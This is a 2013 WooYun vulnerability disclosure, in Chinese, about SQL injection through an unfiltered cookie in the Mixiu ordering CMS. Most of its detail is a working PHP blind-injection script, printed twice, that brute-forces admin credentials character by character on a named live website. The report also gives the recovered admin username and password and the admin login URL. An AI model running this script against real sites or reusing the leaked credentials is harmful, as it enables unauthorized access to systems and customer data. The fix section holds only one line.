当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032528

漏洞标题:米秀订餐系统系统存在SQL注入漏洞

相关厂商:米秀订餐系统

漏洞作者: IT P民

提交时间:2013-07-30 18:22

修复时间:2013-10-28 18:23

公开时间:2013-10-28 18:23

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-10-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

该订餐系统是一个cms,有一部分订餐机构在使用。会员系统直接使用了cookie,并没有过滤,改cookie可以构造sql语句并成功注入,通过猜测管理员表字段,能够暴力破解所有管理员的用户和密码

详细说明:

QQ20130727-5.png


QQ20130727-6.png


构造cookie暴力破解用户密码ascii码

QQ20130727-2.png


构造cookie暴力破解用户名ascii码

QQ20130727-3.png


破解后登陆系统

QQ20130727-4.png


破解代码实例:

<?php
header("Content-Type:text/html;charset=UTF-8");
$tuCurl = curl_init();
curl_setopt($tuCurl, CURLOPT_URL, "http://www.jiajiachufang.com/index.asp");
curl_setopt($tuCurl, CURLOPT_HEADER, TRUE);
curl_setopt($tuCurl, CURLOPT_NOBODY, TRUE); // remove body
curl_setopt($tuCurl, CURLOPT_RETURNTRANSFER, TRUE);
for ($i=1;$i<=5;$i++) {
if (isset($match)) {
unset($match);
}
for ($j=0;$j<128;$j++) {
if (isset($match)) {
continue;
}
$inject = "Cookie:ASPSESSIONIDCCTASSQT=AAOKAPPAMNONKMBBLFLDABIP; KC=username=1'%20and%20(select%20top%201%20asc(mid(admin,{$i},1))%20from%20admin)={$j}%20and%20'1'='1";

//$inject = "Cookie:ASPSESSIONIDCCTASSQT=AAOKAPPAMNONKMBBLFLDABIP; KC=username=1'%20and%20exists(select%20top%201%20[username]%20from%20admin)={$i}%20and%20'1'='1";

curl_setopt($tuCurl, CURLOPT_HTTPHEADER, array($inject));

$tuData = curl_exec($tuCurl);
$httpCode = curl_getinfo($tuCurl, CURLINFO_HTTP_CODE);
if ($httpCode == 200) {
var_dump($inject);
echo "{$i}:{$j} \n";
$match = true;
}

}

}
echo "done\n";

漏洞证明:

<?php
header("Content-Type:text/html;charset=UTF-8");
$tuCurl = curl_init();
curl_setopt($tuCurl, CURLOPT_URL, "http://www.jiajiachufang.com/index.asp");
curl_setopt($tuCurl, CURLOPT_HEADER, TRUE);
curl_setopt($tuCurl, CURLOPT_NOBODY, TRUE); // remove body
curl_setopt($tuCurl, CURLOPT_RETURNTRANSFER, TRUE);
for ($i=1;$i<=5;$i++) {
if (isset($match)) {
unset($match);
}
for ($j=0;$j<128;$j++) {
if (isset($match)) {
continue;
}
$inject = "Cookie:ASPSESSIONIDCCTASSQT=AAOKAPPAMNONKMBBLFLDABIP; KC=username=1'%20and%20(select%20top%201%20asc(mid(admin,{$i},1))%20from%20admin)={$j}%20and%20'1'='1";

//$inject = "Cookie:ASPSESSIONIDCCTASSQT=AAOKAPPAMNONKMBBLFLDABIP; KC=username=1'%20and%20exists(select%20top%201%20[username]%20from%20admin)={$i}%20and%20'1'='1";

curl_setopt($tuCurl, CURLOPT_HTTPHEADER, array($inject));

$tuData = curl_exec($tuCurl);
$httpCode = curl_getinfo($tuCurl, CURLINFO_HTTP_CODE);
if ($httpCode == 200) {
var_dump($inject);
echo "{$i}:{$j} \n";
$match = true;
}

}

}
echo "done\n";


按照上述步骤获得 用户名admin,密码解密之后是 000000
http://www.jiajiachufang.com/admin 可登陆

QQ20130727-4.png

修复方案:

对客户端cookie过滤

版权声明:转载请注明来源 IT P民@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝